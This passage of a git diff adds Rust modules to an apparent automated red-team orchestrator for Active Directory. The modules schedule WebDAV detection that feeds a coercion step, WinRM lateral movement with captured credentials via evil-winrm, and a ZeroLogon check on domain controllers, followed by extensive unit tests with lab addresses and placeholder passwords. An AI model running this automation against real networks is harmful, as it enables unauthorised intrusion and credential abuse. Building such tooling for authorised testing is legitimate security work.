+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(WebDavWork {
+ dedup_key,
+ vuln_id,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+use crate::orchestrator::dispatcher::Dispatcher;
+
+/// Checks discovered hosts for WebDAV service and registers vulnerabilities.
+/// Interval: 45s.
+pub async fn auto_webdav_detection(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("webdav_detection") {
+ continue;
+ }
+
+ let work: Vec<WebDavWork> = {
+ let state = dispatcher.state.read().await;
+ collect_webdav_work(&state)
+ };
+
+ for item in work {
+ // Dispatch a recon task to verify WebDAV is accessible
+ let payload = json!({
+ "technique": "webdav_check",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("webdav_detection");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "WebDAV detection check dispatched"
+ );
+
+ // Also register the vuln proactively (service tag is strong signal)
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: item.vuln_id,
+ vuln_type: "webdav_enabled".to_string(),
+ target: item.target_ip.clone(),
+ discovered_by: "auto_webdav_detection".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert(
+ "hostname".to_string(),
+ serde_json::Value::String(item.hostname.clone()),
+ );
+ d.insert(
+ "domain".to_string(),
+ serde_json::Value::String(item.domain.clone()),
+ );
+ d.insert(
+ "target_ip".to_string(),
+ serde_json::Value::String(item.target_ip.clone()),
+ );
+ d
+ },
+ recommended_agent: "coercion".to_string(),
+ priority: 4,
+ };
+
+
let _ = dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await; + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WEBDAV_DETECTION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WEBDAV_DETECTION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WebDAV detection deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WebDAV detection"); + } + } + } + } +} + +struct WebDavWork { + dedup_key: String, + vuln_id: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("webdav:{}", "192.168.58.22"); + assert_eq!(key, "webdav:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WEBDAV_DETECTION, "webdav_detection"); + } + + #[test] + fn webdav_service_detection_webdav() { + let services = ["80/tcp webdav".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_iis() { + let services = ["80/tcp iis httpd".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_http() { + let services = ["80/tcp http".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) 
+ }); + assert!(has_webdav); + } + + #[test] + fn no_webdav_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "webdav_enabled_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "web01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn webdav_service_detection_webclient() { + let services = ["WebClient service running".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_detection_case_insensitive() { + let services = ["80/TCP WEBDAV".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(has_webdav); + } + + #[test] + fn webdav_service_not_port_80_without_http() { + // Port 80 alone without "http" keyword should not match + let services = ["80/tcp other_service".to_string()]; + let has_webdav = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + assert!(!has_webdav); + } + + #[test] + fn domain_from_hostname_bare() { + let hostname = 
"web01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn domain_from_hostname_subdomain() { + let hostname = "web01.child.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "child.contoso.local"); + } + + #[test] + fn vuln_id_format_various_ips() { + let ips = ["192.168.58.10", "192.168.58.22", "192.168.58.240"]; + for ip in ips { + let vuln_id = format!("webdav_enabled_{}", ip.replace('.', "_")); + assert!(vuln_id.starts_with("webdav_enabled_")); + assert!(!vuln_id.contains('.')); + } + } + + #[test] + fn credential_domain_matching() { + let domain = "contoso.local".to_string(); + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!(cred_domain.to_lowercase(), domain); + } + + #[test] + fn credential_domain_matching_empty_domain() { + let domain = "".to_string(); + let cred_domain = "contoso.local"; + // When domain is empty, the first branch should fail and fall through + let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain; + assert!(!matches); + } + + #[test] + fn webdav_vuln_details_construction() { + let hostname = "web01.contoso.local".to_string(); + let domain = "contoso.local".to_string(); + let target_ip = "192.168.58.22".to_string(); + let mut d = std::collections::HashMap::new(); + d.insert( + "hostname".to_string(), + serde_json::Value::String(hostname.clone()), + ); + d.insert( + "domain".to_string(), + serde_json::Value::String(domain.clone()), + ); + d.insert( + "target_ip".to_string(), + serde_json::Value::String(target_ip.clone()), + ); + assert_eq!(d.len(), 3); + assert_eq!(d["hostname"], serde_json::json!("web01.contoso.local")); + assert_eq!(d["domain"], serde_json::json!("contoso.local")); + assert_eq!(d["target_ip"], serde_json::json!("192.168.58.22")); + } + + #[test] + fn webdav_payload_structure() { + let payload = 
serde_json::json!({
+ "technique": "webdav_check",
+ "target_ip": "192.168.58.22",
+ "hostname": "web01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "webdav_check");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "web01.contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn empty_services_no_webdav() {
+ let services: Vec<String> = vec![];
+ let has_webdav = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("webdav")
+ || sl.contains("webclient")
+ || sl.contains("iis")
+ || (sl.contains("80/") && sl.contains("http"))
+ });
+ assert!(!has_webdav);
+ }
+
+ // --- collect_webdav_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_host(
+ ip: &str,
+ hostname: &str,
+ is_dc: bool,
+ services: Vec<String>,
+ ) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services,
+ is_dc,
+ owned: false,
+ }
+ }
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_webdav_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state.hosts.push(make_host(
+ "192.168.58.22",
+ "web01.contoso.local",
+ false,
+ vec!["80/tcp webdav".to_string()],
+ ));
+ let work =
collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_webdav_and_creds_produces_work() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "web01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "webdav:192.168.58.22"); + assert_eq!(work[0].vuln_id, "webdav_enabled_192_168_58_22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_host_without_webdav_services() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["445/tcp microsoft-ds".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_WEBDAV_DETECTION, "webdav:192.168.58.22".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn 
collect_skips_already_registered_vuln() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.discovered_vulnerabilities.insert( + "webdav_enabled_192_168_58_22".to_string(), + ares_core::models::VulnerabilityInfo { + vuln_id: "webdav_enabled_192_168_58_22".to_string(), + vuln_type: "webdav_enabled".to_string(), + target: "192.168.58.22".to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".to_string(), + priority: 4, + }, + ); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_extracts_domain_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.30", + "web01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state + .credentials + .push(make_cred("svc_web", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["WebClient service running".to_string()], + )); + // First cred is fabrikam, second is contoso (matching host domain) + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + state + .credentials + .push(make_cred("user_con", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_con"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_cred_when_no_domain_match() { + let mut state = 
StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Only fabrikam creds, host is contoso + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_fab"); + } + + #[test] + fn collect_bare_hostname_falls_back_to_first_cred() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01", + false, + vec!["80/tcp webdav".to_string()], + )); + state + .credentials + .push(make_cred("fallback_user", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + // bare hostname has empty domain, so domain match fails; falls back to first + assert_eq!(work[0].credential.username, "fallback_user"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + // Good: member server with webdav + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: DC + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: no webdav service + state.hosts.push(make_host( + "192.168.58.40", + "sql01.contoso.local", + false, + vec!["1433/tcp ms-sql-s".to_string()], + )); + // Good: IIS server + state.hosts.push(make_host( + "192.168.58.50", + "ws01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 2); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[1].target_ip, "192.168.58.50"); + } +} diff --git a/ares-cli/src/orchestrator/automation/winrm_lateral.rs 
b/ares-cli/src/orchestrator/automation/winrm_lateral.rs new file mode 100644 index 00000000..ffa42ab6 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/winrm_lateral.rs @@ -0,0 +1,537 @@ +//! auto_winrm_lateral -- attempt WinRM lateral movement with owned credentials. +//! +//! WinRM (port 5985/5986) is a common lateral movement vector in AD environments. +//! evil-winrm provides PowerShell remoting access when credentials are valid and +//! the user has remote management rights. This module dispatches WinRM access +//! attempts against hosts where we have credentials but haven't tried WinRM yet. +//! +//! WinRM complements SMB-based lateral movement (psexec/wmiexec) by working even +//! when SMB is restricted or firewall-filtered. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect WinRM lateral movement work items from current state. +/// +/// Pure logic extracted from `auto_winrm_lateral` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
+fn collect_winrm_lateral_work(state: &StateInner) -> Vec<WinRmWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Check if host has WinRM indicators in services + let has_winrm = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + + if !has_winrm { + continue; + } + + // Skip hosts we already own via secretsdump + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("winrm:{}", host.ip); + if state.is_processed(DEDUP_WINRM_LATERAL, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(WinRmWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Attempts WinRM lateral movement against hosts with owned credentials. +/// Interval: 45s. +pub async fn auto_winrm_lateral(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("winrm_lateral") { + continue; + } + + let work: Vec<WinRmWork> = { + let state = dispatcher.state.read().await; + collect_winrm_lateral_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "winrm_exec", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("winrm_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "WinRM lateral movement dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WINRM_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WINRM_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "WinRM lateral deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch WinRM lateral"); + } + } + } + } +} + +struct WinRmWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip:
&str, hostname: &str, services: Vec<String>) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("winrm:{}", "192.168.58.22"); + assert_eq!(key, "winrm:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WINRM_LATERAL, "winrm_lateral"); + } + + #[test] + fn winrm_service_detection() { + let services = [ + "5985/tcp microsoft-httpapi".to_string(), + "445/tcp microsoft-ds".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn winrm_https_service_detection() { + let services = ["5986/tcp ssl/http".to_string()]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(has_winrm); + } + + #[test] + fn no_winrm_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "3389/tcp ms-wbt-server".to_string(), + ]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain:
"contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "winrm_exec", + "target_ip": "192.168.58.30", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "winrm_exec"); + assert_eq!(payload["target_ip"], "192.168.58.30"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = WinRmWork { + dedup_key: "winrm:192.168.58.30".into(), + target_ip: "192.168.58.30".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "winrm:192.168.58.30"); + assert_eq!(work.target_ip, "192.168.58.30"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn winrm_service_detection_variations() { + let test_cases = vec![ + (vec!["5985/tcp http".to_string()], true), + (vec!["5986/tcp ssl/http".to_string()], true), + (vec!["winrm-service".to_string()], true), + (vec!["WinRM".to_string()], true), + (vec!["445/tcp smb".to_string()], false), + (vec!["3389/tcp rdp".to_string()], false), + ]; + + 
for (services, expected) in test_cases { + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert_eq!( + has_winrm, expected, + "Services {:?} should have winrm={expected}", + services + ); + } + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "web01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn empty_services() { + let services: Vec<String> = vec![]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm, "Empty services should not detect WinRM"); + } + + // --- collect_winrm_lateral_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_winrm_hosts_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["445/tcp smb".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_winrm_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist
secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "winrm:192.168.58.30"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_WINRM_LATERAL, "winrm:192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.hosts.push(make_host( + "192.168.58.31", + "web01.contoso.local", + vec!["5986/tcp ssl/http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 2); + let 
ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.30")); + assert!(ips.contains(&"192.168.58.31")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_bare_hostname() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + // Bare hostname -> empty domain -> falls back to first cred + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + } + let state = shared.read().await; + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } +} diff --git 
a/ares-cli/src/orchestrator/automation/zerologon.rs b/ares-cli/src/orchestrator/automation/zerologon.rs new file mode 100644 index 00000000..128dd633 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/zerologon.rs @@ -0,0 +1,269 @@ +//! auto_zerologon -- check domain controllers for CVE-2020-1472 (ZeroLogon). +//! +//! ZeroLogon allows unauthenticated privilege escalation by exploiting a flaw +//! in the Netlogon protocol. Even on patched systems, the check is fast and +//! non-destructive. Dispatches `zerologon_check` (recon only, no exploit) +//! against each discovered DC once. +//! +//! If the check reports the DC is vulnerable, result processing will register +//! a "zerologon" vulnerability that other modules can act on. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_zerologon_work(state: &StateInner) -> Vec<ZerologonWork> { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_ZEROLOGON, dc_ip)) + .map(|(domain, dc_ip)| { + // Derive the DC hostname (NetBIOS name) from hosts or domain + let hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip) + .map(|h| h.hostname.clone()) + .unwrap_or_default(); + + ZerologonWork { + domain: domain.clone(), + dc_ip: dc_ip.clone(), + hostname, + } + }) + .collect() +} + +/// Monitors for domain controllers and 